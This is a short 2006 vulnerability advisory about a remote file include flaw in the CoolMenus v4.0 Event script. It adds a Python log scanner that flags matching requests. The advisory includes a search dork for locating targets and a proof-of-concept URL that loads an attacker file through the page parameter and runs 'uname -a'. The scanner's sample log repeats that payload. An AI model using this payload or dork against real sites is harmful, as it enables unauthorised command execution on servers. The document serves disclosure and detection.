CoolMenus.txt

2006-04-29T00:00:00
ID PACKETSTORM:45921
Type packetstorm
Reporter Andries Bruinsma
Modified 2006-04-29T00:00:00

Description

                                        
                                            `Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html  
  
#CoolMenus Event Remote File Include Vulnerability#  
#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]  
#Script : CoolMenus v4.0 Event Script  
#Risk : High  
#Class : Remote  
#Greetz : B3g0k,Nistiman,Flot,Netqurd etc..  
#d0rk : "/event/index.php?page="   
  
I.  
  
  
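require("event_inc.php");            // load the script's include file  
echo "Events";   
$start = filectime($news);           // inode change time of the file named by $news  
$jetzt = time();                     // current time ("jetzt" is German for "now")  
$update = "$start"+"$timespan";      // numeric sum: change time plus $timespan  
if($jetzt >= $update)   
{include("event_html.php");}         // included once $timespan has elapsed  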
  
II.  
  
Proof of Concept:  
  
http://www.site.com/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a  
`
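
A log check for the request shape in the Proof of Concept above, added here as an example and not part of the original advisory: it flags requests to /event/index.php whose page value is not a plain local file name or that carry a cmd parameter. The log lines are constructed, and the rule that legitimate page values are plain file names is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path taken from the advisory. Assumption: legitimate "page"
# values are plain local file names such as event_html.php.
TARGET = "/event/index.php"
SAFE_PAGE = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+) HTTP/[0-9.]+"')

def check_line(line):
    """Return the reasons an access-log line looks like an include attempt."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith(TARGET):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    for value in params.get("page", []):
        if "://" in value or value.startswith("//"):
            reasons.append("page points at a remote URL")
        elif not SAFE_PAGE.fullmatch(value):
            reasons.append("page is not a plain local file name")
    if "cmd" in params:
        reasons.append("unexpected cmd parameter")
    return reasons

def scan(lines):
    """Return (line number, reasons) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        reasons = check_line(line)
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample log (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Apr/2006:10:00:00 +0000] "GET /event/index.php?page=event_html.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [29/Apr/2006:10:00:05 +0000] "GET /shop/event/index.php?page=evilcode.txt?&cmd=uname%20-a HTTP/1.1" 200 97',
    '198.51.100.7 - - [29/Apr/2006:10:00:09 +0000] "GET /event/index.php?page=http://files.example.net/x.txt? HTTP/1.1" 200 97',
    '192.0.2.10 - - [29/Apr/2006:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```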